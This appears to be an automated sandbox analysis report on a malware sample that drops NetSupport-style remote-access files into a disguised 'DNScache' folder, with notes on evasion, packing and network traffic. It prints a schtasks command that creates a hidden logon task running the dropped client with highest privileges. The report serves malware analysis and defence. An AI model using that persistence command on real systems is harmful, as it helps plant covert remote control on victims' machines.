                                Source: Binary string: msvcr100.i386.pdb source: client32.exe, client32.exe, 00000007.00000002.3304858661.000000006CDF1000.00000020.00000001.01000000.00000011.sdmp, client32.exe, 00000009.00000002.2890200975.000000006CDF1000.00000020.00000001.01000000.00000011.sdmp, msvcr100.dll.4.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: client32.exe, 00000007.00000002.3305095577.000000006F6F2000.00000002.00000001.01000000.0000000F.sdmp, client32.exe, 00000009.00000002.2890449063.000000006F6F2000.00000002.00000001.01000000.0000000F.sdmp, PCICHEK.DLL.4.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, client32.exe, 00000009.00000002.2889815261.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, PCICL32.DLL.4.dr
                                Source: Binary string: msauserext.pdbGCTL source: msauserext.dll.4.dr
                                Source: Binary string: mscpxl32.pdb source: mscpxl32.dLL.4.dr
                                Source: Binary string: mscpxl32.pdbGCTL source: mscpxl32.dLL.4.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: PCICHEK.DLL.4.dr
                                Source: Binary string: mscat32.pdbGCTL source: mscat32.dll.4.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: client32.exe, 00000007.00000002.3304754604.000000006CD80000.00000002.00000001.01000000.00000012.sdmp, HTCTL32.DLL.4.dr
                                Source: Binary string: d:\a01\_work\2\s\\binaries\x86ret\bin\i386\\msvcp140_1.i386.pdb source: msvcp140_1.dll.4.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\AudioCapture\Release\AudioCapture.pdb source: AudioCapture.dll.4.dr
                                Source: Binary string: client32_ctr.pdb0\1100\client32\Release\client32_ctr.pdbP source: AddInProcess32.exe, 00000004.00000002.2880341312.000000000108F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.4.dr
                                Source: Binary string: msauserext.pdb source: msauserext.dll.4.dr
                                Source: Binary string: client32_ctr.pdb source: AddInProcess32.exe, 00000004.00000002.2880341312.000000000108F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.4.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\release\tcctl32.pdbP source: TCCTL32.DLL.4.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: client32.exe, 00000007.00000002.3304754604.000000006CD80000.00000002.00000001.01000000.00000012.sdmp, HTCTL32.DLL.4.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: client32.exe, 00000007.00000002.3305005916.000000006CEB5000.00000002.00000001.01000000.00000010.sdmp, client32.exe, 00000009.00000002.2890355521.000000006CEB5000.00000002.00000001.01000000.00000010.sdmp, pcicapi.dll.4.dr
                                Source: Binary string: mscat32.pdb source: mscat32.dll.4.dr
                                Source: Binary string: 0\1100\client32\Release\client32_ctr.pdb source: AddInProcess32.exe, 00000004.00000002.2880341312.000000000108F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.4.dr
                                Source: Binary string: d:\a01\_work\2\s\\binaries\x86ret\bin\i386\\msvcp140_codecvt_ids.i386.pdb source: msvcp140_codecvt_ids.dll.4.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\release\tcctl32.pdb source: TCCTL32.DLL.4.dr

                                Data Obfuscation

                                Source: Yara match File source: 0.2.Jjv9ha2GKn.exe.51e0000.5.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 0.2.Jjv9ha2GKn.exe.51e0000.5.raw.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 00000000.00000002.2759945326.00000000051E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                                Source: Yara match File source: 00000000.00000002.2751641971.00000000027A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match File source: Process Memory Space: Jjv9ha2GKn.exe PID: 6512, type: MEMORYSTR
                                Source: netmsg.dll.4.dr Static PE information: 0xB44EAFAF [Tue Nov 10 05:14:23 2065 UTC]
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 7_2_11029200 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary, 7_2_11029200
                                Source: msauserext.dll.4.dr Static PE information: section name: .didat
                                Source: PCICL32.DLL.4.dr Static PE information: section name: .hhshare
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Code function: 0_2_05B9EFD2 push esp; ret 0_2_05B9EFD9
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Code function: 0_2_05B9FE52 push eax; retf 0_2_05B9FE59
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Code function: 0_2_05B929D1 push esp; retf 0_2_05B929D2
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Code function: 0_2_05BCC4E0 push edi; iretd 0_2_05BCC4EE
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Code function: 0_2_05BCA223 push esp; iretd 0_2_05BCA232
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Code function: 0_2_05BCB7F0 push ebp; iretd 0_2_05BCB7F6
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Code function: 0_2_05BCB160 push ebx; iretd 0_2_05BCB166
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Code function: 0_2_05BC9E00 push edx; iretd 0_2_05BC9E0A
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Code function: 0_2_05BCBAF0 push edi; iretd 0_2_05BCC4BE
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Code function: 0_2_05BC9A28 push ecx; iretd 0_2_05BC9A42
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Code function: 0_2_07159B34 pushad ; retf 0_2_07159B8D
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Code function: 0_2_07151A0C push esp; ret 0_2_07151A9D
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Code function: 0_2_07157979 push ecx; retf 0046h 0_2_0715799A
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Code function: 0_2_0715BCD7 push eax; iretd 0_2_0715BCE6
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Code function: 0_2_0715F0FF push edi; retf 0_2_0715F102
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Code function: 0_2_07194BFB push edi; ret 0_2_07194DF6
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Code function: 0_2_07194E04 push eax; ret 0_2_07194E35
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Code function: 0_2_07195A58 pushfd ; retf 0_2_07195A59
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Code function: 0_2_071974AD push ds; retf 0040h 0_2_071974FE
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Code function: 0_2_07AFA630 push 00000059h; ret 0_2_07AFA670
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Code function: 0_2_07B3B06F push ecx; retf EFCDh 0_2_07B3B1DA
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4_2_0041B9DD push esi; ret 4_2_0041B9E6
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4_2_0041C20E push eax; retf 4_2_0041C21D
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4_2_0041BC40 pushad ; ret 4_2_0041BC45
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4_2_0041CD72 pushad ; ret 4_2_0041CE21
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4_2_004206B0 push ss; iretd 4_2_00420745
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4_2_00417F81 push ecx; ret 4_2_00417F94
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 7_2_1116B735 push ecx; ret 7_2_1116B748
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 7_2_11166629 push ecx; ret 7_2_1116663C
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 7_2_6CD76BBF push ecx; ret 7_2_6CD76BD2
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 7_2_6CD694C5 push ecx; ret 7_2_6CD694D8
                                Source: msvcr100.dll.4.dr Static PE information: section name: .text entropy: 6.909044922675825
                                Source: Jjv9ha2GKn.exe, n2P6H.cs High entropy of concatenated method names: 'k9ER', 'c9HL', 'e9Y5', 'Dz7q', 'o3GN', 'c7BN', 'Ff65', 'Jn9c', 'g3LF', 'Ak2b'
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Local\DNScache\mscpx32r.dLL
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Local\DNScache\msauserext.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Local\DNScache\PCICHEK.DLL
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Local\DNScache\netmsg.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Local\DNScache\mscat32.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Local\DNScache\msvcr100.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Local\DNScache\pcicapi.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Local\DNScache\client32.exe
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Local\DNScache\remcmdstub.exe
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Local\DNScache\HTCTL32.DLL
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Local\DNScache\msvcp140_1.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Local\DNScache\AudioCapture.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Local\DNScache\neth.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Local\DNScache\mscpxl32.dLL
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Local\DNScache\PCICL32.DLL
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Local\DNScache\TCCTL32.DLL
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Local\DNScache\msvcp140_codecvt_ids.dll
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 7_2_6CD57030 ctl_open,LoadLibraryA,InitializeCriticalSection,CreateEventA,CreateEventA,CreateEventA,CreateEventA,WSAStartup,_malloc,_memset,_calloc,_malloc,_memset,_malloc,_memset,GetTickCount,CreateThread,SetThreadPriority,GetModuleFileNameA,GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,timeBeginPeriod, 7_2_6CD57030
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 7_2_6CD45490 GetPrivateProfileIntA, 7_2_6CD45490
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 7_2_6CD450E0 CreateFileA,wsprintfA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,CreateFileA,GetFileSize,GetPrivateProfileIntA,SetFilePointer,FlushFileBuffers,CloseHandle,wsprintfA,CreateFileA,__itow,WritePrivateProfileStringA, 7_2_6CD450E0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 7_2_6CD45117 GetPrivateProfileIntA,wsprintfA,CreateFileA,GetFileSize,GetPrivateProfileIntA,SetFilePointer,FlushFileBuffers,CloseHandle,wsprintfA,CreateFileA,__itow,WritePrivateProfileStringA, 7_2_6CD45117

                                Boot Survival

                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc ONLOGON /tn "DNScache" /tr "C:\Users\user\AppData\Local\DNScache\client32.exe" /RL HIGHEST
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 7_2_11124DC0 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError, 7_2_11124DC0

                                Hooking and other Techniques for Hiding and Protection

                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe File opened: C:\Users\user\Desktop\Jjv9ha2GKn.exe\:Zone.Identifier read attributes | delete
                                Source: unknown Network traffic detected: HTTP traffic on port 49865 -> 3785
                                Source: unknown Network traffic detected: HTTP traffic on port 3785 -> 49865
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 7_2_111365D0 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary, 7_2_111365D0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 7_2_11157150 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop, 7_2_11157150
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 7_2_11025180 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer, 7_2_11025180
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 7_2_11157550 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows, 7_2_11157550
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 7_2_110255D0 IsIconic,BringWindowToTop,GetCurrentThreadId, 7_2_110255D0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 7_2_1110F720 IsIconic,GetTickCount, 7_2_1110F720
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 7_2_1111F990 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA, 7_2_1111F990
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 7_2_110238A0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer, 7_2_110238A0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 7_2_110BFC50 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId, 7_2_110BFC50
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 7_2_11023F80 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId, 7_2_11023F80
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 7_2_11110340 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt, 7_2_11110340
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 7_2_110CA260 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos, 7_2_110CA260
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 9_2_11157150 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop, 9_2_11157150
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 9_2_11025180 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer, 9_2_11025180
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 9_2_11157550 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows, 9_2_11157550
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 9_2_110255D0 IsIconic,BringWindowToTop,GetCurrentThreadId, 9_2_110255D0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 9_2_1110F720 IsIconic,GetTickCount, 9_2_1110F720
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 9_2_1111F990 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA, 9_2_1111F990
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 9_2_110238A0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer, 9_2_110238A0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 9_2_110BFC50 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId, 9_2_110BFC50
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 9_2_11023F80 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId, 9_2_11023F80
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 9_2_11110340 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt, 9_2_11110340
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 9_2_110CA260 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos, 9_2_110CA260
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 9_2_111365D0 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary, 9_2_111365D0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 7_2_11029200 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary, 7_2_11029200
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\DNScache\client32.exe Process information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

Source: Yara match, file source: Process Memory Space: Jjv9ha2GKn.exe PID: 6512, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 7_2_6CD491F0
Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 7_2_6CD54F30
Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 7_2_110B7290 Sleep,ExitProcess
Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 9_2_110B7290 Sleep,ExitProcess
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess (graph_4-10745)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep (graph_4-10745)
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Memory allocated: 2500000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Memory allocated: 27A0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Memory allocated: 2500000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Memory allocated: 7C40000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Memory allocated: 8C40000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Memory allocated: 8E10000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Memory allocated: 9E10000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Memory allocated: A1A0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Memory allocated: B1A0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Memory allocated: C1A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 7_2_6CD57F80 _memset,LoadLibraryA,GetProcAddress,GetAdaptersInfo,_malloc,GetAdaptersInfo,wsprintfA,_free,FreeLibrary
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Window / User API: threadDelayed 1724
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Window / User API: threadDelayed 8132
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\DNScache\mscpx32r.dLL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\DNScache\msauserext.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\DNScache\netmsg.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\DNScache\mscat32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\DNScache\remcmdstub.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\DNScache\HTCTL32.DLL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\DNScache\msvcp140_1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\DNScache\mscpxl32.dLL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\DNScache\neth.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\DNScache\AudioCapture.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\DNScache\TCCTL32.DLL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\DNScache\msvcp140_codecvt_ids.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Evaded block: after key decision (graph_4-11135)
Source: C:\Users\user\AppData\Local\DNScache\client32.exe Evaded block: after key decision (graph_7-119350)
Source: C:\Users\user\AppData\Local\DNScache\client32.exe Evaded block: after key decision (graph_7-121102)
Source: C:\Users\user\AppData\Local\DNScache\client32.exe Evaded block: after key decision (graph_7-121157)
Source: C:\Users\user\AppData\Local\DNScache\client32.exe Evaded block: after key decision (graph_7-121507)
Source: C:\Users\user\AppData\Local\DNScache\client32.exe Evaded block: after key decision (graph_7-124778)
Source: C:\Users\user\AppData\Local\DNScache\client32.exe Evaded block: after key decision (graph_7-125165)
Source: C:\Users\user\AppData\Local\DNScache\client32.exe Evaded block: after key decision (graph_7-125419)
Source: C:\Users\user\AppData\Local\DNScache\client32.exe Evaded block: after key decision
Source: C:\Users\user\AppData\Local\DNScache\client32.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\AppData\Local\DNScache\client32.exe Evasive API call chain: GetLocalTime,DecisionNodes (graph_7-124910)
Source: C:\Users\user\AppData\Local\DNScache\client32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes (graph_7-121457)
Source: C:\Users\user\AppData\Local\DNScache\client32.exe API coverage: 5.4 %
Source: C:\Users\user\AppData\Local\DNScache\client32.exe API coverage: 2.6 %
Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 7_2_6CD54F30
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172 Thread sleep time: -28592453314249787s >= -30000s
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172 Thread sleep time: -35000s >= -30000s
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172 Thread sleep time: -34875s >= -30000s
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172 Thread sleep time: -34765s >= -30000s
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172 Thread sleep time: -34656s >= -30000s
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172 Thread sleep time: -34547s >= -30000s
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172 Thread sleep time: -34437s >= -30000s
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172 Thread sleep time: -34328s >= -30000s
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172 Thread sleep time: -34216s >= -30000s
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172 Thread sleep time: -34094s >= -30000s
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172 Thread sleep time: -33984s >= -30000s
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172 Thread sleep time: -33872s >= -30000s
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172 Thread sleep time: -33750s >= -30000s
